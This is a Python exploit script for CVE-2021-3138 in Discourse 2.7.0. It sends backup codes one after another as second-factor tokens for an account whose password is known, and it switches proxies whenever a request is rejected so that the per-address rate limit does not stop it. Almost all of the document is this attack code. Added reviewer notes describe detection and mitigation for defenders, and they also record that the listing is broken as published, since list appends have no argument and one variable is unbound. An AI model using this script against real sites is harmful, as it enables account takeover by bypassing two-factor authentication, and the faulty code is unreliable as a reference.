# Exploit Title: Discourse 2.7.0 - Rate Limit Bypass leads to 2FA Bypass
# Date: 14/01/2021
# Exploit Author: Mesh3l_911
# Vendor Homepage: https://www.discourse.org/
# Software Link: https://github.com/discourse/discourse
# Version: Discourse 2.7.0
# CVE: CVE-2021-3138
import requests
# Account credentials are read interactively. The request built in exploit()
# sends both the login and the password together with the second-factor value
# being tried.
username = input("\n input ur username : ")
password = input("\n input ur password : ")
# One requests session is shared by every request the script sends.
session=requests.session()

# Declared as the list of proxy addresses. NOTE(review): the function defined
# right after this is also named `proxies`, so once that `def` has executed
# this list is no longer reachable under this name.
proxies = []
def proxies():
    """Prompt for the path of a proxy list file and walk its lines.

    The file is read in full and split into lines; ``proxies.append()`` is
    called once per line.

    NOTE(review): indentation was lost when this page was extracted and has
    been reconstructed here. Nothing in the listing as shown calls this
    function; main() calls exploit() only.
    """
    proxies_path = input("\n input ur proxies path : ")

    with open(proxies_path, 'r') as prox:
        for _ in prox.read().splitlines():
            # NOTE(review): append() is called without an argument, and the
            # name `proxies` refers to this function at this point, not to the
            # module-level list declared before it.
            proxies.append()
# Declared as the list of candidate second-factor values; exploit() calls
# backup_codes.remove() on it after each request.
backup_codes = []
def backup_list():
    """Prompt for the path of a candidate-code file and walk its lines.

    The file is read in full and split into lines; ``backup_codes.append()``
    is called once per line.

    NOTE(review): indentation was lost when this page was extracted and has
    been reconstructed here. Nothing in the listing as shown calls this
    function; main() calls exploit() only.
    """
    # Local name differs from the module-level list only by its capital B.
    Backup_codes = input("\n input ur Backup_codes list path : ")

    with open(Backup_codes, 'r') as codes:
        for _ in codes.read().splitlines():
            # NOTE(review): append() is called without an argument, so the
            # line that was just read is not what gets passed to the list.
            backup_codes.append()
def exploit():
    """Submit second-factor candidates for one account, changing proxy on rejection.

    For each proxy and each candidate value, one POST is sent carrying the
    login, the password, the candidate as ``second_factor_token`` and
    ``second_factor_method`` set to "2" (presumably the backup-code method,
    going by the variable names -- confirm against Discourse). A 200 response
    whose body contains ``"id"`` is treated as a successful login: the value
    is written to ``Backup_codes.txt`` and True is returned. Any other status
    drops the current proxy and moves on to the next one. Every other path
    falls off the end of the function and returns None.

    What this means for a defender: switching proxy on a non-200 status
    suggests the affected limit was counted per source address -- confirm
    against the advisory for CVE-2021-3138. Failed second-factor attempts
    therefore need to be counted per account. The signal to look for is one
    login presenting a correct password followed by many second-factor
    failures spread across many source addresses. Mitigation is to run a
    Discourse release that contains the fix for this CVE, and to reissue
    backup codes and rotate the password of any account that shows this
    pattern.

    NOTE(review): indentation was lost when this page was extracted; the
    nesting below is a reconstruction. As listed, ``codes`` is not bound in
    this scope and ``proxies`` refers to the function of that name rather than
    a list, so the loops do not run as published.
    """
    with open('Backup_codes.txt', 'w') as results:
        try:
            for __ in proxies:
                for _ in codes.read().splitlines():
                    # The CSRF token, cookie and target URL are placeholders
                    # the author left to be filled in by hand.
                    header =\
                    {
                        "X-CSRF-Token": "ur X-CSRF-Token",
                        "Cookie": "ur Cookie",
                        "X-Requested-With": "XMLHttpRequest"
                    }
                    body = {"login": username, "password": password, "second_factor_token": _, "second_factor_method": "2"}
                    request = session.post("ur target_url", headers=header, data=body, proxies={'http': __, 'https':__})
                    source = request.text
                    # The candidate is removed whether or not it was accepted.
                    backup_codes.remove(_)

                    if request.status_code == 200:
                        # Success is inferred from the literal text "id"
                        # (with quotes) appearing in the response body.
                        if '"id"' in source:
                            results.write("The Backup_Coude is > {} ".format(_))
                            return True
                        else:
                            pass
                    else:
                        # A non-200 status is taken to mean this source has
                        # been limited; it is dropped and the next is used.
                        proxies.remove(__)
                        break

        # `X and Y` evaluates to Y here, so this clause names
        # requests.exceptions.ConnectionError only.
        except requests.exceptions.SSLError and requests.exceptions.ConnectionError:
            print(" Connection Failed :( ")

    # Redundant: the `with` block already closes the file. NOTE(review): the
    # original nesting level of this call could not be recovered.
    results.close()
def main():
    """Run exploit() and print whether it reported a match.

    exploit() returns True only when a response was accepted as a successful
    login; every other outcome returns None and takes the else branch here.
    """
    if exploit():
        print("\n Found :) \n")
    else:
        print("\n Please re-check ur inputs :( \n")
# Script entry point: main() runs only when the file is executed directly,
# not when it is imported.
if __name__ == '__main__':
    main()